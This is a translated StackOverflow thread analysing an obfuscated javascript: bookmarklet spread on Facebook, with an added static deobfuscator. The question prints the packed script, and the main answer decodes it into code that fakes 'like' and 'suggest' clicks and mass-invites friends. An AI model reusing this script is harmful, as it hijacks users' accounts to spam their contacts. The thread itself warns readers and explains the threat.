
Notice: this page is a Chinese/English side-by-side translation of a popular StackOverflow question, licensed under CC BY-SA 4.0. If you use it you must follow the same CC BY-SA licence, cite the original address and author information, and attribute it to the original authors (not me). StackOverflow original: http://stackoverflow.com/questions/2731345/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me): StackOverFlow

Time: 2020-08-23 01:41:45  Source: igfitidea

What exactly does this piece of JavaScript do?

Tags: javascript, facebook

Asked by Waltzy

I saw this page growing in popularity among my social circles on Facebook, what 98 percent bla bla...and it walks users through copying the below JavaScript (I added some indentation to make it more readable) into their address bar. Looks dodgy to me, but I only have a very basic knowledge of JavaScript.


Simply put, what does this do?


javascript:(function(){
a='app120668947950042_jop';
b='app120668947950042_jode';
ifc='app120668947950042_ifc';
ifo='app120668947950042_ifo';
mw='app120668947950042_mwrapper';
eval(function(p,a,c,k,e,r){
    e=function(c){
        return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}
    ;
    if(!''.replace(/^/,String)){
        while(c--)r[e(c)]=k[c]||e(c);
        k=[function(e){
            return r[e]}
        ];
        e=function(){
            return'\w+'}
        ;
        c=1}
    ;
    while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);
    return p}
('J e=["\n\g\j\g\F\g\i\g\h\A","\j\h\A\i\f","\o\f\h\q\i\f\r\f\k\h\K\A\L\t","\w\g\t\t\f\k","\g\k\k\f\x\M\N\G\O","\n\l\i\y\f","\j\y\o\o\f\j\h","\i\g\H\f\r\f","\G\u\y\j\f\q\n\f\k\h\j","\p\x\f\l\h\f\q\n\f\k\h","\p\i\g\p\H","\g\k\g\h\q\n\f\k\h","\t\g\j\z\l\h\p\w\q\n\f\k\h","\j\f\i\f\p\h\v\l\i\i","\j\o\r\v\g\k\n\g\h\f\v\P\u\x\r","\B\l\Q\l\R\B\j\u\p\g\l\i\v\o\x\l\z\w\B\g\k\n\g\h\f\v\t\g\l\i\u\o\S\z\w\z","\j\y\F\r\g\h\T\g\l\i\u\o"];
        d=U;
        d[e[2]](V)[e[1]][e[0]]=e[3];
        d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
        s=d[e[2]](e[6]);
        m=d[e[2]](e[7]);
        c=d[e[9]](e[8]);
        c[e[11]](e[10],I,I);
        s[e[12]](c);
        C(D(){
            W[e[13]]()}
        ,E);
        C(D(){
            X[e[16]](e[14],e[15])}
        ,E);
        C(D(){
            m[e[12]](c);
            d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]}
        ,E);
        ',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{
}
))})();

Answered by bobince

I don't know so many are downvoting this. You are absolutely right to be suspicious about packed and otherwise-obfuscated scripts, especially with the rash of malvertisements affecting FB apps at the moment.


The first trick is to replace the eval on the results of the unpacker with an alert so you can see the code instead of executing it. That gives you something you can easily (but boringly) manually decode to:


document.getElementById('app120668947950042_mwrapper').style.visibility='hidden';
document.getElementById('app120668947950042_jop').innerHTML=document.getElementById('app120668947950042_jode').value;
s=document.getElementById('suggest');
m=document.getElementById('likeme');
c=document.createEvent('MouseEvents');
c.initEvent('click',true,true);
s.dispatchEvent(c);

setTimeout(function(){
    fs.select_all()
}, 5000);
setTimeout(function(){
    SocialGraphManager.submitDialog('sgm_invite_form','/ajax/social_graph/invite_dialog.php')
}, 5000);
setTimeout(function(){
    m.dispatchEvent(c);
    document.getElementById('app120668947950042_ifo').innerHTML=document.getElementById('app120668947950042_ifc').value
}, 5000);

That looks like it's faking clicks on the 'like' and 'suggest' buttons (and the subsequent dialogue), circumventing the normal controls FB require to interact with the site.


I'd report this page to FB.


In general, anything that asks you to enter a JavaScript URL is up to no good. This is the poor-man's XSS. By allowing someone's code onto a page through a JS URL you are trusting them to do anything they want with your use of the site, as this crude social-engineering attempt demonstrates. It's depressing if a lot of people are falling for this. Maybe it's time for browsers to disallow typing javascript: URLs in the address bar.


Curse you, Netscape, for inventing the ugly javascript: not-really-a-URL hack and the thousands of security holes that have resulted from it!

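The two obfuscation layers discussed on this page (Dean Edwards' p,a,c,k,e,r wrapper around a hex-escaped string array) can be undone as pure text rewriting, which is the safe version of the "replace eval with alert" trick above and of the "packing function" reading in the next answer. The following is an added example and is not code from the question or from any of the answers: it reimplements the unpacker's token substitution without eval, decodes the \xNN escapes, and inlines the string-array lookups. The packed sample it runs on is constructed for the demonstration, the function names and the three-stage split are my own, and the third stage assumes the double-quoted `var NAME=[...]` array form seen in this payload.

```javascript
// Added example, not code from the question or from any of the answers.
// Static decoder for Dean Edwards "p,a,c,k,e,r" output layered over a
// hex-escaped string array (the shape of the payload in the question).
// Nothing here is ever passed to eval(); every stage is text rewriting.

// Stage 1: undo the packer. e(n) is the packer's base-`a` token name and
// k[n] the word it stands for; an empty k entry means "keep the token".
// This mirrors the packer's own bootstrap, minus the eval at the end.
function unpackPacker(p, a, c, k) {
  const e = function (n) {
    return (n < a ? '' : e(Math.floor(n / a))) +
      ((n = n % a) > 35 ? String.fromCharCode(n + 29) : n.toString(36));
  };
  const dict = Object.create(null);
  while (c--) dict[e(c)] = k[c] || e(c);
  // One pass over whole words, like the packer's \w+ lookup branch.
  return p.replace(/\b\w+\b/g, (w) => (w in dict ? dict[w] : w));
}

// Stage 2: turn \xNN escapes into characters. Quotes and backslashes are
// re-escaped so the rewritten string literals stay syntactically intact.
function decodeHexEscapes(src) {
  return src.replace(/\\x([0-9A-Fa-f]{2})/g, (_, hex) => {
    const ch = String.fromCharCode(parseInt(hex, 16));
    return ch === '"' || ch === "'" || ch === '\\' ? '\\' + ch : ch;
  });
}

// Stage 3: inline NAME[i] lookups into the string array they point at,
// then rewrite obj["ident"] as obj.ident. Heuristic (assumption): one
// `var NAME=["..",".."];` declaration with double-quoted, ]-free items.
function inlineStringArray(src) {
  const decl = src.match(/var\s+([A-Za-z_$][\w$]*)\s*=\s*\[([^\]]*)\];?/);
  if (!decl) return src;
  const [whole, name, body] = decl;
  const items = body.match(/"(?:[^"\\]|\\.)*"/g) || [];
  let out = src.replace(whole, '');
  const ref = new RegExp(name.replace(/\$/g, '\\$') + '\\[(\\d+)\\]', 'g');
  out = out.replace(ref, (m, i) => (items[i] !== undefined ? items[i] : m));
  return out.replace(/\["([A-Za-z_$][\w$]*)"\]/g, '.$1');
}

function deobfuscate(p, a, c, k) {
  return inlineStringArray(decodeHexEscapes(unpackPacker(p, a, c, k)));
}

// Constructed sample in the same shape as the question's payload: a packed
// string, base 62, ten tokens, and the '|'-separated dictionary.
// Tokens 0 and 1 are left empty so array indexes survive as literal digits,
// just as the question's dictionary starts with a run of empty entries.
const SAMPLE_P = '2 3=["\\4\\5","\\6\\7\\8"];9[3[1]](3[0])';
const SAMPLE_A = 62;
const SAMPLE_C = 10;
const SAMPLE_K = '||var|_0xab|x68|x69|x6C|x6F|x67|console'.split('|');

// Runs the three stages separately so each intermediate form can be read.
function demo() {
  const stage1 = unpackPacker(SAMPLE_P, SAMPLE_A, SAMPLE_C, SAMPLE_K);
  const stage2 = decodeHexEscapes(stage1);
  const stage3 = inlineStringArray(stage2);
  return { stage1, stage2, stage3 };
}

const r = demo();
console.log('after unpack :', r.stage1);
console.log('after hex    :', r.stage2);
console.log('readable     :', r.stage3);
```

For the payload in the question the same call is `unpackPacker(p, 62, 69, k.split('|'))`, with `p` copied exactly as it appears in the script (backslashes doubled as in the source) and `k` the long `'||||...|mw|fs|SocialGraphManager|...'` string; stage 1 then yields the `_0x95ea=[...]` program that bobince decoded by hand, and stages 2 and 3 turn it into the readable form shown in his answer, without any of it ever running in a browser.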

Answered by Mitch Dempsey

At first glance, it looks like a packing function, used to compress code into a string. Think of it like gzip compression.


Answered by joshowen

That looks like the code to invite your friends to join a group, or something along those lines.


They've been floating around Facebook for a while.
